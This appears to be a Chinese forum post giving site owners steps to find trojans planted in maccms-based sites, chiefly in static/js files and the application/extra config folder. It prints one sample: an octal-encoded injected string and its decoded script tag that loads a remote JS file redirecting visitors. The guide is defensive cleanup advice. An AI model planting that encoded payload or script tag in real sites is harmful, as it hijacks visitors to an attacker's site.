请选择 进入手机版 | 继续访问电脑版

苹果cms经常被挂马的位置

[复制链接]
查看454 | 回复0 | 2021-4-11 23:31:36 | 显示全部楼层 |阅读模式
苹果cms经常被挂马,应该去哪里找,最快查找木马文件方法。

1.如果知道是那天被挂马的查看当天日志即可,宝塔日志存放在/www/wwwlogs中(影视网站建议定期查看日志,没问题的话就及时清理掉,不多说,懂的人已经在做了,作为一名站长你必须学会分析日志,他会给你解决很多问题,不懂的请百度)

2.如果不知道是那天被挂的请按照我下面的步骤来

第一步切换模板查看木马是否依旧存在,通常是还会存在的,因为木马根本不在模板中(如果是定时执行的木马清理浏览器cookies后继续查看即可)

第二步确认模板没有问题后查看static/js里面的js文件里面是否存在加密文件,如果存在直接用原先的替换(如果模板没有用到static/js里的文件可以忽略这一步)

第三步查看application\extra文件夹里面的全部文件,目前最新的挂马位置一般都是这个文件夹,挨个文件查看,只要任何一个文件里存在function()这样的字眼直接删除,因为这个是存放网站配置的文件夹,里面的内容应该全部是以数组形式存储,不会存在function()这种函数。

005547fvp1clglz36ipc33.jpg


类似这样的文件,这是就一个木马,他的主要功能就是给你的网站插入一行js代码

\170\234\263\051\116\056\312\054\050\121\050\056\112\266\125\312\050\051\051\260\322\327\057\057\057\327\313\115\114\116\316\055\326\053\313\054\320\117\317\317\117\321\313\052\126\262\263\321\207\050\266\003\000\004\101\022\366

这行代码我们打印看一下他的内容是

<script src="http://www.maccms.vip/good.js"></script>

一个js文件,这个js文件的内只有一句话,跳转至yaoshuidh点com这个网站





总结:最早木马通常是被挂在static/js文件夹的js中,现在通常是被添加在application\extra文件夹里

我们不得不发现这个b在进步,越来越难缠了....


回复

使用道具 举报

快捷回复
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则